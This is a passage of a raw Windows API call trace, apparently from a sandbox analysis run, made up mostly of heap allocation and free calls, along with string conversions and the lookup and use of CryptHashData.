(in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54de8 | out: hHeap=0x970000) returned 1 [0210.655] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50830 [0210.655] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54de8 [0210.655] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54de8 | out: hHeap=0x970000) returned 1 [0210.655] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50950 [0210.655] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d98 [0210.656] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50890 [0210.656] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d98 | out: hHeap=0x970000) returned 1 [0210.656] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x3) returned 0x2e54ee8 [0210.656] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54de8 [0210.656] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ea8 [0210.656] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 4 [0210.656] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d98 [0210.656] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x2e54d98, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="888", lpUsedDefaultChar=0x0) returned 4 [0210.656] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d98 | out: hHeap=0x970000) returned 1 [0210.656] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54de8 | out: hHeap=0x970000) returned 1 [0210.656] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ea8 | out: hHeap=0x970000) returned 1 [0210.656] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e28 [0210.656] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50890 | out: hHeap=0x970000) returned 1 [0210.656] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ef8 [0210.656] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x3) returned 0x2e54ed8 [0210.656] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507d0 | out: hHeap=0x970000) returned 1 [0210.656] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0210.656] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x977cf8 | out: hHeap=0x970000) returned 1 [0210.656] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69c08 | out: hHeap=0x970000) returned 1 [0210.656] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508a8 | out: hHeap=0x970000) returned 1 [0210.656] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50830 | out: hHeap=0x970000) returned 1 [0210.656] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0210.656] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e28 | out: hHeap=0x970000) returned 1 [0210.657] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50950 | out: hHeap=0x970000) returned 1 [0210.657] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507a0 | out: hHeap=0x970000) returned 1 [0210.657] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ed8 | out: hHeap=0x970000) returned 1 [0210.657] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ef8 | out: hHeap=0x970000) returned 1 [0210.657] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0210.657] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ee8 [0210.657] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50908 [0210.657] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e508a8 [0210.657] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e18 [0210.657] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e80220 [0210.657] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ed8 [0210.657] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0210.657] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e80220 | out: hHeap=0x970000) returned 1 [0210.657] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ed8 | out: hHeap=0x970000) returned 1 [0210.657] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e507a0 [0210.657] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78810 [0210.657] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0210.657] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54dc8 [0210.657] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ea8 [0210.657] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ea8 | out: hHeap=0x970000) returned 1 [0210.657] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dc8 | out: hHeap=0x970000) returned 1 [0210.657] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78810 | out: hHeap=0x970000) returned 1 [0210.657] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507a0 | out: hHeap=0x970000) returned 1 [0210.657] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0210.657] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50998 [0210.658] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e28 [0210.658] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509b0 [0210.658] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e28 | out: hHeap=0x970000) returned 1 [0210.658] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50830 [0210.658] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ed8 [0210.658] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e508d8 [0210.658] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ed8 | out: hHeap=0x970000) returned 1 [0210.658] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50950 [0210.658] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e18 [0210.658] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50890 [0210.658] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0210.658] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54210 [0210.658] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50908 | out: hHeap=0x970000) returned 1 [0210.658] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507a0 [0210.658] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ef8 [0210.658] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ef8 | out: hHeap=0x970000) returned 1 [0210.658] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50908 [0210.658] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e18 [0210.658] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506c8 [0210.658] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0210.658] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507d0 [0210.659] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ef8 [0210.659] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69b28 [0210.659] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x977ae8 [0210.659] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509f8 [0210.659] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e68 [0210.659] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ef8 | out: hHeap=0x970000) returned 1 [0210.659] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c50 [0210.659] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54de8 [0210.659] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a70 [0210.659] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54de8 | out: hHeap=0x970000) returned 1 [0210.659] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78810 [0210.659] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54210 | out: hHeap=0x970000) returned 1 [0210.659] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a28 [0210.659] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ed8 [0210.659] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50bf0 [0210.659] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b60 [0210.659] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d98 [0210.659] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e699c8 [0210.659] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x977b18 [0210.659] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509c8 [0210.659] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d28 [0210.659] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d98 | out: hHeap=0x970000) returned 1 [0210.660] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509c8 | out: hHeap=0x970000) returned 1 [0210.660] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d28 | out: hHeap=0x970000) returned 1 [0210.660] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x977b18 | out: hHeap=0x970000) returned 1 [0210.660] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e699c8 | out: hHeap=0x970000) returned 1 [0210.660] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b60 | out: hHeap=0x970000) returned 1 [0210.660] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bf0 | out: hHeap=0x970000) returned 1 [0210.660] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ed8 | out: hHeap=0x970000) returned 1 [0210.660] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50aa0 [0210.660] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ea8 [0210.660] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50cb0 [0210.660] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ea8 | out: hHeap=0x970000) returned 1 [0210.660] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c68 [0210.660] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ef8 [0210.660] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ef8 | out: hHeap=0x970000) returned 1 [0210.660] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d58 [0210.660] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50bc0 [0210.660] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0210.660] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a10 [0210.660] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e38 [0210.660] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ed8 [0210.660] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ad0 [0210.660] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a10 | out: hHeap=0x970000) returned 1 [0210.661] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e38 | out: hHeap=0x970000) returned 1 [0210.661] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ad0 | out: hHeap=0x970000) returned 1 [0210.661] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ed8 | out: hHeap=0x970000) returned 1 [0210.661] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50bd8 [0210.661] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ef8 [0210.661] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509c8 [0210.661] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d38 [0210.661] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54dc8 [0210.661] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a88 [0210.661] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509c8 | out: hHeap=0x970000) returned 1 [0210.661] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d38 | out: hHeap=0x970000) returned 1 [0210.661] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a88 | out: hHeap=0x970000) returned 1 [0210.661] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dc8 | out: hHeap=0x970000) returned 1 [0210.661] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d68 [0210.661] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a10 [0210.661] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d28 [0210.661] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d98 [0210.661] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a88 [0210.661] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a10 | out: hHeap=0x970000) returned 1 [0210.661] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d28 | out: hHeap=0x970000) returned 1 [0210.661] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a88 | out: hHeap=0x970000) returned 1 [0210.662] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d98 | out: hHeap=0x970000) returned 1 [0210.662] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ea8 [0210.662] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a88 [0210.662] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54dc8 [0210.662] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e18 [0210.662] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50bf0 [0210.662] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a88 | out: hHeap=0x970000) returned 1 [0210.662] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dc8 | out: hHeap=0x970000) returned 1 [0210.662] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bf0 | out: hHeap=0x970000) returned 1 [0210.662] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0210.662] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54de8 [0210.662] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b18 [0210.662] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d78 [0210.662] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54eb8 [0210.662] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509c8 [0210.662] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b18 | out: hHeap=0x970000) returned 1 [0210.662] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d78 | out: hHeap=0x970000) returned 1 [0210.662] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509c8 | out: hHeap=0x970000) returned 1 [0210.662] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54eb8 | out: hHeap=0x970000) returned 1 [0210.662] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50bf0 [0210.662] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d98 [0210.662] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0210.663] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xe) returned 0x2e50c38 [0210.663] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x2e50c38, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptHashData", lpUsedDefaultChar=0x0) returned 14 [0210.663] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c38 | out: hHeap=0x970000) returned 1 [0210.663] GetProcAddress (hModule=0x756e0000, lpProcName="CryptHashData") returned 0x756feef0 [0210.663] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bf0 | out: hHeap=0x970000) returned 1 [0210.663] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d98 | out: hHeap=0x970000) returned 1 [0210.663] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c80 [0210.663] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54dc8 [0210.663] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e18 [0210.663] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e38 [0210.663] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d38 [0210.663] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dc8 | out: hHeap=0x970000) returned 1 [0210.663] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0210.663] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e38 | out: hHeap=0x970000) returned 1 [0210.663] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d38 | out: hHeap=0x970000) returned 1 [0210.664] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c80 | out: hHeap=0x970000) returned 1 [0210.664] CryptHashData (hHash=0xa87050, pbData=0x2e54df8, dwDataLen=0x3, dwFlags=0x1) returned 1 [0210.664] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x978490 [0210.664] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e698c8 [0210.664] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d38 [0210.664] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b90 [0210.664] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b78 [0210.664] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509e0 [0210.664] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d98 [0210.664] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509e0 | out: hHeap=0x970000) returned 1 [0210.664] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d98 | out: hHeap=0x970000) returned 1 [0210.664] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b78 | out: hHeap=0x970000) returned 1 [0210.664] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50bf0 [0210.664] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c80 [0210.664] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c38 [0210.664] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d98 [0210.664] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c38 | out: hHeap=0x970000) returned 1 [0210.664] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d98 | out: hHeap=0x970000) returned 1 [0210.664] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c80 | out: hHeap=0x970000) returned 1 [0210.664] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c38 [0210.664] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b18 [0210.664] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c80 [0210.665] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e18 [0210.665] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c80 | out: hHeap=0x970000) returned 1 [0210.665] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0210.665] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b18 | out: hHeap=0x970000) returned 1 [0210.665] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69928 [0210.665] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x977c98 [0210.665] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ad0 [0210.665] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ed8 [0210.665] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ae8 [0210.665] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b00 [0210.665] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b78 [0210.665] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e48 [0210.665] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b78 | out: hHeap=0x970000) returned 1 [0210.665] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e48 | out: hHeap=0x970000) returned 1 [0210.665] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b00 | out: hHeap=0x970000) returned 1 [0210.665] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a88 [0210.665] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a10 [0210.665] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b60 [0210.665] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d78 [0210.665] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b60 | out: hHeap=0x970000) returned 1 [0210.665] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d78 | out: hHeap=0x970000) returned 1 [0210.666] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a10 | out: hHeap=0x970000) returned 1 [0210.666] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ef8 | out: hHeap=0x970000) returned 1 [0210.666] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d68 | out: hHeap=0x970000) returned 1 [0210.666] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ea8 | out: hHeap=0x970000) returned 1 [0210.666] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54de8 | out: hHeap=0x970000) returned 1 [0210.666] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bd8 | out: hHeap=0x970000) returned 1 [0210.666] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bc0 | out: hHeap=0x970000) returned 1 [0210.666] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d58 | out: hHeap=0x970000) returned 1 [0210.666] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508a8 | out: hHeap=0x970000) returned 1 [0210.666] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509b0 | out: hHeap=0x970000) returned 1 [0210.666] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50998 | out: hHeap=0x970000) returned 1 [0210.666] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508d8 | out: hHeap=0x970000) returned 1 [0210.666] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50830 | out: hHeap=0x970000) returned 1 [0210.666] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50890 | out: hHeap=0x970000) returned 1 [0210.666] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50950 | out: hHeap=0x970000) returned 1 [0210.666] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507a0 | out: hHeap=0x970000) returned 1 [0210.666] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506c8 | out: hHeap=0x970000) returned 1 [0210.666] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50908 | out: hHeap=0x970000) returned 1 [0210.666] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509f8 | out: hHeap=0x970000) returned 1 [0210.666] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e68 | out: hHeap=0x970000) returned 1 [0210.666] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x977ae8 | out: hHeap=0x970000) returned 1 [0210.666] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b28 | out: hHeap=0x970000) returned 1 [0210.666] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507d0 | out: hHeap=0x970000) returned 1 [0210.667] HeapFree (in: 